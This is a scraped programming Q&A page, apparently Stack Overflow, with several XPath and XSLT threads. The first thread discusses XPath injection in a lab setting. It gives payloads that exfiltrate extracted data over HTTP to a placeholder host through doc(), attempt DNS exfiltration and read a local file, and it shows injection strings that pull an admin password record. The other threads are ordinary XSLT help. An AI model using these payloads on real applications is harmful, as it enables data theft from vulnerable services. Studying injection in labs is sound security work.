xpath injections and doc() function - xpath

I'm trying to understand how to use the doc() function of xpath in several ways to carry out xpath injections
Lab's query:
String xquery = "/root/books/book[contains(title/text(), '" + query + "')]";
I can use both versions 2.0 and 3.0
I'm able to extract data and export it through HTTP, for example:
test') and doc((concat('http://IP/data/?d=',(encode-for-uri((normalize-space((/*[1]/*[2]/*[2]/#*[2]))))))))/data=220248 and string('1'='1
But i'm not able to:
Extract data and export it through DNS requests:
test') and doc((concat(name((/[2])) , 'domain.com'))) and string('1'='1* -> it does not give any error, but nothing happens ( i don't know why stackoverflow strips the * from /*[2] )
Read a local xml file ( file's permissions are fine )
test') and doc('file:///home/lubuntu/test.xml')/text() and string('1'='1 -> it says file not found, when it is clearly there..
What is wrong in my payloads?
#updates
xpath processor: net.sf.saxon
os: Linux lubuntu 4.18.0-17-generic #18~18.04.1-Ubuntu
JAVA_HOME=/usr/local/openjdk-11
JAVA_VERSION=11.0.9.1
LANG=C.UTF-8
#about the file reading: problem solved. the lab was running inside of a docker
#about the data exfiltration via dns requests, i still can't figure it out why nothing happens. I tried also basic injection like doc((concat('ABCTEST', '.domain.com' ))) and string('1'='1 but still nothing happens..

It is difficult to understand what exactly you are trying to achieve.
Here is a simple example of XPath injection in XSLT/XPath 3.0 using as a base the fact that:
contains($anyString), '') eq true()
Xml document:
<x>
<root>
<books>
<book>
<title>Book1</title>
</book>
<book>
<title>Book2</title>
</book>
<book>
<title>Book3</title>
</book>
</books>
</root>
</x>
XSLT stylesheet:
<xsl:stylesheet version="3.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output omit-xml-declaration="yes" indent="yes"/>
<xsl:template match="/">
<xsl:variable name="query">'</xsl:variable>
<xsl:variable name="vXpath1">/x/root/books/book[contains(title/text(), '</xsl:variable>
<xsl:variable name="vXpath2" select="$vXpath1 || $query || ')]'"/>
<xsl:evaluate xpath="$vXpath2" context-item="/" />
</xsl:template>
</xsl:stylesheet>
and finally, the result of applying the transformation on the Xml document:
<book>
<title>Book1</title>
</book>
<book>
<title>Book2</title>
</book>
<book>
<title>Book3</title>
</book>
Explanation:
We were able to get all <book> elements of the document and not only one of them that contains a particular string (the password :) ) in its <title>
Update
Here is another example:
we have a slightly different XML document:
<x>
<root>
<books>
<book name="regular">
<title>Book1 with password: regular</title>
</book>
<book name="admin">
<title>Admin with password: SuperSecret</title>
</book>
<book name="maintainer">
<title>Book3 with password: maintainer</title>
</book>
</books>
</root>
</x>
And the transformation now is (only $query is changed):
<xsl:stylesheet version="3.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output omit-xml-declaration="yes" indent="yes"/>
<xsl:template match="/">
<xsl:variable name="query">') and #name eq "admin" and true(</xsl:variable>
<xsl:variable name="vXpath1">/x/root/books/book[contains(title/text(), '</xsl:variable>
<xsl:variable name="vXpath2" select="$vXpath1 || $query || ')]'"/>
<xsl:evaluate xpath="$vXpath2" context-item="/" />
</xsl:template>
</xsl:stylesheet>
Now the result is that we get exactly the <book> element with the desired name "admin":
<book name="admin">
<title>Admin with password: SuperSecret</title>
</book>

Related

XSLT apply templates select condition on node list

I have an xml with a list and wanted to apply template on that which will send only specific nodes by a condition, but it is applying on the whole list. Could someone if I am missing anything, I am relatively new to XSL.
The condition I wanted to apply is if dep is 7 and no city tag exists, I started with condition to check if dep is 7. After apply template if i print my list, it is getting all of them, Instead of dep just with value 7.In my output I expect not to have dep with value 9.
Input XML:
<employeeList>
<employee>
<dep>7</dep>
<salary>900</salary>
</employee>
<employee>
<dep>7</dep>
<city>LA</city>
<salary>500</salary>
</employee>
<employee>
<dep>9</dep>
<salary>600</salary>
</employee>
<employee>
<dep>7</dep>
<salary>800</salary>
</employee>
</employeeList>
My XSL:
<xsl:apply-templates select="employeeList[employee/dep = '7']" mode="e"/>
<xsl:template match="employeeList" mode="e">
<xsl:for-each select="employee">
<dep>
<xsl:value-of select="dep" />
</dep>
</xsl:for-each>
Output XML:
<dep>7</dep><dep>7</dep><dep>9</dep><dep>7</dep>
The condition I wanted to apply is if dep is 7 and no city tag exists
Such condition can be easily implemented using e.g.:
XSLT 1.0
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output method="xml" version="1.0" encoding="UTF-8" indent="yes"/>
<xsl:template match="/employeeList">
<root>
<xsl:for-each select="employee[dep='7' and not(city)]">
<dep>7</dep>
</xsl:for-each>
</root>
</xsl:template>
</xsl:stylesheet>
Or shortly:
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output method="xml" version="1.0" encoding="UTF-8" indent="yes"/>
<xsl:template match="/employeeList">
<root>
<xsl:copy-of select="employee[dep='7' and not(city)]/dep"/>
</root>
</xsl:template>
</xsl:stylesheet>
But it's hard to see the point in outputting X number of <dep>7</dep> elements.
You select the employeeList based on a condition on its employee/dep, but once you have selected it, that condition no longer matters, and the <xsl:for-each select="employee"> selects all employees, regardless of their dep.
You can repeat the condition in the xsl:for-each statement:
<xsl:for-each select="employee[dep = '7']">

Find first occurence of node without traversing all of them using XPaths and elementpath library

I use elementpath to handle some XPath queries. I have an XML with linear structure which contains a unique id attribute.
<items>
<item id="1">...</item>
<item id="2">...</item>
<item id="3">...</item>
... 500k elements
<item id="500003">...</item>
</items>
I want the parser to find the first occurence without traversing all the nodes. For example, I want to select //items/item[#id = '3'] and stop after iterating over 3 nodes only (not over 500k of nodes). It would be a nice optimization for many cases.
An example using XSLT 3 streaming with a static parameter for the XPath, then using xsl:iterate with xsl:break to produce the "early exit" once the first item sought has been found would be
<?xml version="1.0" encoding="utf-8"?>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
version="3.0"
xmlns:xs="http://www.w3.org/2001/XMLSchema"
exclude-result-prefixes="#all">
<xsl:param name="path" static="yes" as="xs:string" select="'items/item[#id = ''3'']'"/>
<xsl:output method="xml"/>
<xsl:mode on-no-match="shallow-copy" streamable="yes"/>
<xsl:template match="/" name="xsl:initial-template">
<xsl:iterate _select="{$path}">
<xsl:if test="position() = 1">
<xsl:copy-of select="."/>
<xsl:break/>
</xsl:if>
</xsl:iterate>
</xsl:template>
</xsl:stylesheet>
You can run it with SaxonC EE (unfortunately streaming is only supported by EE) and Python with e.g.
import saxonc
with saxonc.PySaxonProcessor(license=True) as proc:
print("Test SaxonC on Python")
print(proc.version)
xslt30proc = proc.new_xslt30_processor()
xslt30proc.set_parameter('path', proc.make_string_value('/items/item[#id = "2"]'))
transformer = xslt30proc.compile_stylesheet(stylesheet_file='iterate-items-early-exit1.xsl')
xdm_result = transformer.apply_templates_returning_value(source_file='items-sample1.xml')
if transformer.exception_occurred:
print(transformer.error_message)
print(xdm_result)

Nokogiri XSLT transform using multiple source XML files

I want to translate XML using Nokogiri. I built an XSL and it all works fine. I ALSO tested it in Intellij. My data comes from two XML files.
My problem occurs when I try to get Nokogiri to do the transform. I can't seem to find a way to get it to parse multiple source files.
This is the code I am using from the documentation:
require 'Nokogiri'
doc1 = Nokogiri::XML(File.read('F:/transcoder/xslt_repo/core_xml.xml',))
xslt = Nokogiri::XSLT(File.read('F:/transcoder/xslt_repo/google.xsl'))
puts xslt.transform(doc1)
I tried:
require 'Nokogiri'
doc1 = Nokogiri::XML(File.read('F:/transcoder/xslt_repo/core_xml.xml',))
doc2 = Nokogiri::XML(File.read('F:/transcoder/xslt_repo/file_data.xml',))
xslt = Nokogiri::XSLT(File.read('F:/transcoder/xslt_repo/test.xsl'))
puts xslt.transform(doc1,doc2)
However it seems transform only takes one argument, so at the moment I am only able to parse half the data I need:
<?xml version="1.0"?>
<package package_id="LB000001">
<asset_metadata>
<series_title>test asset 1</series_title>
<season_title>Number 1</season_title>
<episode_title>ET 1</episode_title>
<episode_number>1</episode_number>
<license_start_date>21-07-2016</license_start_date>
<license_end_date>31-07-2016</license_end_date>
<rating>15</rating>
<synopsis>This is a test asset</synopsis>
</asset_metadata>
<video_file>
<file_name/>
<file_size/>
<check_sum/>
</video_file>
<image_1>
<file_name/>
<file_size/>
<check_sum/>
</image_1>
</package>
How can I get this to work?
Edit:
This is the core_metadata.xml which is created via a PHP code block and the data comes from a database.
<?xml version="1.0" encoding="utf-8"?>
<manifest task_id="00000000373">
<asset_metadata>
<material_id>LB111111</material_id>
<series_title>This is a test</series_title>
<season_title>This is a test</season_title>
<season_number>1</season_number>
<episode_title>that test</episode_title>
<episode_number>2</episode_number>
<start_date>23-08-2016</start_date>
<end_date>31-08-2016</end_date>
<ratings>15</ratings>
<synopsis>this is a test</synopsis>
</asset_metadata>
<file_info>
<source_filename>LB111111</source_filename>
<number_of_segments>2</number_of_segments>
<segment_1 seg_1_start="00:00:10.000" seg_1_dur="00:01:00.000"/>
<segment_2 seg_2_start="00:02:00.000" seg_2_dur="00:05:00.000"/>
<conform_profile definition="hd" aspect_ratio="16f16">ffmpeg -i S_PATH/F_NAME.mp4 SEG_CONFORM 2> F:/Transcoder/logs/transcode_logs/LOG_FILE.txt</conform_profile>
<transcode_profile profile_name="xbox" package_type="tar">ffmpeg -f concat -i T_PATH/CONFORM_LIST TRC_PATH/F_NAME.mp4 2> F:/Transcoder/logs/transcode_logs/LOG_FILE.txt</transcode_profile>
<target_path>F:/profiles/xbox</target_path>
</file_info>
</manifest>
The second XML (file_date.xml) is dynamically create during the trancode process by nokogiri:
<?xml version="1.0"?>
<file_data>
<video_file>
<file_name>LB111111_xbox_230816114438.mp4</file_name>
<file_size>141959922</file_size>
<md5_checksum>bac7670e55c0694059d3742285079cbf</md5_checksum>
</video_file>
<image_1>
<file_name>test</file_name>
<file_size>test</file_size>
<md5_checksum>test</md5_checksum>
</image_1>
</file_data>
I managed to work around this issue by making a call to by hard coding the file_date.xml into the XSLT file:
<xsl:stylesheet version="2.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output method="xml" indent="yes"/>
<xsl:template match="/">
<package>
<xsl:attribute name="package_id">
<xsl:value-of select="manifest/asset_metadata/material_id"/>
</xsl:attribute>
<asset_metadata>
<series_title>
<xsl:value-of select="manifest/asset_metadata/series_title"/>
</series_title>
<season_title>
<xsl:value-of select="manifest/asset_metadata/season_title"/>
</season_title>
<episode_title>
<xsl:value-of select="manifest/asset_metadata/episode_title"/>
</episode_title>
<episode_number>
<xsl:value-of select="manifest/asset_metadata/episode_number"/>
</episode_number>
<license_start_date>
<xsl:value-of select="manifest/asset_metadata/start_date"/>
</license_start_date>
<license_end_date>
<xsl:value-of select="manifest/asset_metadata/end_date"/>
</license_end_date>
<rating>
<xsl:value-of select="manifest/asset_metadata/ratings"/>
</rating>
<synopsis>
<xsl:value-of select="manifest/asset_metadata/synopsis"/>
</synopsis>
</asset_metadata>
<video_file>
<file_name>
<xsl:value-of select="document('file_data.xml')/file_data/video_file/file_name"/>
</file_name>
<file_size>
<xsl:value-of select="document('file_data.xml')/file_data/video_file/file_size"/>
</file_size>
<check_sum>
<xsl:value-of select="document('file_data.xml')/file_data/video_file/md5_checksum"/>
</check_sum>
</video_file>
<image_1>
<file_name>
<xsl:value-of select="document('file_data.xml')/file_data/image_1/file_name"/>
</file_name>
<file_size>
<xsl:value-of select="document('file_data.xml')/file_data/image_1/file_size"/>
</file_size>
<check_sum>
<xsl:value-of select="document('file_data.xml')/file_data/image_1/md5_checksum"/>
</check_sum>
</image_1>
</package>
</xsl:template>
I then use Saxon to do the transform:
xslt = "java -jar C:/SaxonHE9-7-0-7J/saxon9he.jar #{temp}core_metadata.xml #{temp}#{profile}.xsl > #{temp}#{file_name}.xml"
system("#{xslt}")
I would love to find a way to do this without having to hardcode the file_date.xml into the XSLT.
Merge XML Documents and Transform
You'll have to do a bit of work to combine the XML content prior to your XLS-Transformation. #the-Tin-Man has a nice answer to a similar question in the archives, which can be adapted for your use case.
Let's say we have the following sample content:
<!--a.xml-->
<?xml version="1.0"?>
<xml>
<packages>
<package>Data here for A</package>
<package>Another Package</package>
</packages>
</xml>
<!--a.xml-->
<!--b.xml-->
<?xml version="1.0"?>
<xml>
<packages>
<package>B something something</package>
</packages>
</xml>
<!--end b.xml-->
And we want to apply the following XLST template:
<!--transform.xslt-->
<?xml version="1.0"?>
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:template match="//packages">
<html>
<body>
<h2>Packages</h2>
<ol>
<xsl:for-each select="./package">
<li><xsl:value-of select="text()"/></li>
</xsl:for-each>
</ol>
</body>
</html>
</xsl:template>
</xsl:stylesheet>
<!--end transform.xslt-->
If we have parallel document structure, as in this case, we can merge the two XML documents' content together and pass that along for transformation.
require 'Nokogiri'
doc1 = Nokogiri::XML(File.read('./a.xml'))
doc2 = Nokogiri::XML(File.read('./b.xml'))
moved_packages = doc2.search('package')
doc1.at('/descendant::packages[1]').add_child(moved_packages)
xslt = Nokogiri::XSLT(File.read('./transform.xslt'))
puts xslt.transform(doc1)
This would generate the following output:
<html><body>
<h2>Packages</h2>
<ol>
<li>Data here for A</li>
<li>Another Package</li>
<li>B something something</li>
</ol>
</body></html>
If your XML documents have varying structure, you may benefit from an intermediary XML nodeset that you add your content to, rather than the shortcut of merging document 2 content into document 1.

How do I use the msxsl:node-set to get a node set that I can use in a template parameter?

TL;DR; Why can't I use the element name in the XPATH going against a msxsl:node-set? It always returns nothing, as if the node-set is empty, when debugging shows that it is not empty.
Details: I need to use a node-set in an XSLT 1.0 document because my source XML is missing an important node. Instead of having to rewrite the entire XSLT, I'd like to instead inject a node-set so that my XSLT processing can continue as normal. I would like to use XPATH on the node-set but I am not able to use the actual element names, instead only a * works, but I am not sure why, or how I can access the actual element names in the XPATH.
Here is my XML (example only, the XML document here is the least important, see XSLT):
<?xml version="1.0" encoding="utf-8" ?>
<?xml-stylesheet type="text/xsl" href="generic.xslt" ?>
<ParentNode xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" i:noNamespaceSchemaLocation="generic.xsd">
<SomeChildNode>text</SomeChildNode>
</ParentNode>
Here is my XSLT:
<?xml version="1.0" encoding="utf-16"?>
<xsl:stylesheet version="1.0" xmlns="http://schemas.datacontract.org/2004/07/MeM.BizEntities.Integration.DataFeedV2" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:a="http://schemas.datacontract.org/2004/07/MeM.BizEntities" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:i="http://www.w3.org/2001/XMLSchema-instance">
<xsl:output method="xml" indent="yes" encoding="utf-16" omit-xml-declaration="no" />
<!-- Global Variables, used in multiple places -->
<xsl:variable name="empty"/>
<!-- Match Templates -->
<xsl:template match="ParentNode">
<ArrayOfSalesOrder>
<xsl:for-each select="SomeChildNode">
<xsl:call-template name="SomeChildNodeTemplate">
<xsl:with-param name="order" select="."/>
</xsl:call-template>
</xsl:for-each>
</ArrayOfSalesOrder>
</xsl:template>
<xsl:template name="SomeChildNodeTemplate">
<xsl:variable name="someRTF">
<Items>
<Item>
<Code>code</Code>
<Price>75</Price>
<Quantity>1</Quantity>
</Item>
<Item>
<Code>code2</Code>
<Price>100</Price>
<Quantity>3</Quantity>
</Item>
</Items>
</xsl:variable>
<xsl:call-template name="ItemsTemplate">
<xsl:with-param name="items" select="msxsl:node-set($someRTF)"/>
</xsl:call-template>
</xsl:template>
<xsl:template name="ItemsTemplate">
<xsl:param name="items"/>
<ItemsTransformed>
<xsl:for-each select="$items/Item">
<NewItem>
<NewCode>
<xsl:value-of select="Code"/>
</NewCode>
</NewItem>
</xsl:for-each>
</ItemsTransformed>
<ItemsTransformedThatWorksButNotHowIWant>
<xsl:for-each select="$items/*/*">
<NewItem>
<NewCode>
<xsl:value-of select="*[1]"/>
</NewCode>
<NewPrice>
<xsl:value-of select="*[2]"/>
</NewPrice>
<NewQuantity>
<xsl:value-of select="*[3]"/>
</NewQuantity>
</NewItem>
</xsl:for-each>
</ItemsTransformedThatWorksButNotHowIWant>
</xsl:template>
</xsl:stylesheet>
I would expect to be able to use XPATH to query into the node-set such that I can use their proper element names. This doesn't seem to be the case, and I'm struggling to understand why. I know there can be namespacing issues, but trying *:Item etc. doesn't work for me. I am able to use *[local-name()='Item'] but this seems like a horrible work around, not to mention that I'll have to rewrite any downstream templates and that is what I'm trying to avoid by using the node-set in the first place.
Result:
<?xml version="1.0" encoding="utf-16"?>
<ArrayOfSalesOrder xmlns="http://schemas.datacontract.org/2004/07/MeM.BizEntities.Integration.DataFeedV2" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:a="http://schemas.datacontract.org/2004/07/MeM.BizEntities" xmlns:i="http://www.w3.org/2001/XMLSchema-instance">
<ItemsTransformed />
<ItemsTransformedThatWorksButNotHowIWant>
<NewItem>
<NewCode>code</NewCode>
<NewPrice>75</NewPrice>
<NewQuantity>1</NewQuantity>
</NewItem>
<NewItem>
<NewCode>code2</NewCode>
<NewPrice>100</NewPrice>
<NewQuantity>3</NewQuantity>
</NewItem>
</ItemsTransformedThatWorksButNotHowIWant>
</ArrayOfSalesOrder>
As you can see, I can get it to work with * but this is not very usable on a more complex structure. What am I doing wrong? Does this have to do with namespaces?
I would expect to see something under the <ItemsTransformed /> node, but instead it is just empty, and so far I can't get anything except the * to work.
The SO question below is what I was using, I thought I had an answer there, but I can't get the XPATH to work.
Reference:
XSLT 1.0 - Create node set and pass as a parameter
The problem here is that your stylesheet has a default namespace:
xmlns="http://schemas.datacontract.org/2004/07/MeM.BizEntities.Integration.DataFeedV2"
Therefore, when you do:
<xsl:variable name="someRTF">
<Items>
<Item>
<Code>code</Code>
<Price>75</Price>
<Quantity>1</Quantity>
</Item>
<Item>
<Code>code2</Code>
<Price>100</Price>
<Quantity>3</Quantity>
</Item>
</Items>
</xsl:variable>
you are populating your variable with elements in the default namespace, so the variable actually contains:
<Items xmlns="http://schemas.datacontract.org/2004/07/MeM.BizEntities.Integration.DataFeedV2">
<Item>
<Code>code</Code>
<Price>75</Price>
<Quantity>1</Quantity>
</Item>
<Item>
<Code>code2</Code>
<Price>100</Price>
<Quantity>3</Quantity>
</Item>
</Items>
Naturally, when you try later to select something like:
<xsl:for-each select="xyz:node-set($someRTF)/Items/Item">
you select nothing, because both Items and Item are in the default namespace and you're not calling them by their fully qualified name.
--- edit: ---
The problem can be easily solved by making sure that the root element of the variable - and by extension, all its descendants - are in no namespace.
Here's a simplified example (will run with any input):
XSLT 1.0
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns="http://schemas.datacontract.org/2004/07/MeM.BizEntities.Integration.DataFeedV2"
xmlns:exsl="http://exslt.org/common"
exclude-result-prefixes="exsl">
<xsl:output method="xml" version="1.0" encoding="UTF-8" indent="yes"/>
<xsl:variable name="someRTF">
<Items xmlns="">
<Item>
<Code>code</Code>
<Price>75</Price>
<Quantity>1</Quantity>
</Item>
<Item>
<Code>code2</Code>
<Price>100</Price>
<Quantity>3</Quantity>
</Item>
</Items>
</xsl:variable>
<xsl:template match="/">
<ArrayOfSalesOrder>
<ItemsTransformed>
<xsl:for-each select="exsl:node-set($someRTF)/Items/Item">
<NewItem>
<NewCode>
<xsl:value-of select="Code"/>
</NewCode>
</NewItem>
</xsl:for-each>
</ItemsTransformed>
</ArrayOfSalesOrder>
</xsl:template>
</xsl:stylesheet>
Result:
<?xml version="1.0" encoding="UTF-8"?>
<ArrayOfSalesOrder xmlns="http://schemas.datacontract.org/2004/07/MeM.BizEntities.Integration.DataFeedV2">
<ItemsTransformed>
<NewItem>
<NewCode>code</NewCode>
</NewItem>
<NewItem>
<NewCode>code2</NewCode>
</NewItem>
</ItemsTransformed>
</ArrayOfSalesOrder>

Xpath: filter out childs

I'm looking for a xpath expression that filters out certain childs. A child must contain a CCC node with B in it.
Source:
<AAA>
<BBB1>
<CCC>A</CCC>
</BBB1>
<BBB2>
<CCC>A</CCC>
</BBB2>
<BBB3>
<CCC>B</CCC>
</BBB3>
<BBB4>
<CCC>B</CCC>
</BBB4>
</AAA>
This should be the result:
<AAA>
<BBB3>
<CCC>B</CCC>
</BBB3>
<BBB4>
<CCC>B</CCC>
</BBB4>
</AAA>
Hopefully someone can help me.
Jos
XPath is a query language for XML documents. As such it can only select nodes from existing XML document(s) -- it cannot modify an XML document or create a new XML document.
Use XSLT in order to transform an XML document and create a new XML document from it.
In this particular case:
<xsl:stylesheet version="1.0"
xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output omit-xml-declaration="yes" indent="yes"/>
<xsl:strip-space elements="*"/>
<xsl:template match="node()|#*">
<xsl:copy>
<xsl:apply-templates select="node()|#*"/>
</xsl:copy>
</xsl:template>
<xsl:template match="/*/*[not(CCC = 'B')]"/>
</xsl:stylesheet>
when this transformation is applied on the provided XML document:
<AAA>
<BBB1>
<CCC>A</CCC>
</BBB1>
<BBB2>
<CCC>A</CCC>
</BBB2>
<BBB3>
<CCC>B</CCC>
</BBB3>
<BBB4>
<CCC>B</CCC>
</BBB4>
</AAA>
the wanted, correct result is produced:
<AAA>
<BBB3>
<CCC>B</CCC>
</BBB3>
<BBB4>
<CCC>B</CCC>
</BBB4>
</AAA>
In order to select all of the desired element and text nodes, use this XPATH:
//node()[.//CCC[.='B']
or self::CCC[.='B']
or self::text()[parent::CCC[.='B']]]
This could be achieved with a more simply/easily using XPATH with a modified identity transform XSLT:
<?xml version="1.0"?>
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">
<xsl:output indent="yes" />
<!--Empty template for the content we want to redact -->
<xsl:template match="*[CCC[not(.='B')]]" />
<!--By default, copy all content forward -->
<xsl:template match="#*|node()">
<xsl:copy>
<xsl:apply-templates/>
</xsl:copy>
</xsl:template>
</xsl:stylesheet>
try this ,
"//CCC[text() = 'B']"
It shall give all CCC nodes where the innertext is B.
If you want to get AAA, BBB3 and BBB4 you can use the following
//*[descendant::CCC[text()='B']]
If BBB3 and BBB4 only then
//*[CCC[text()='B']]

Resources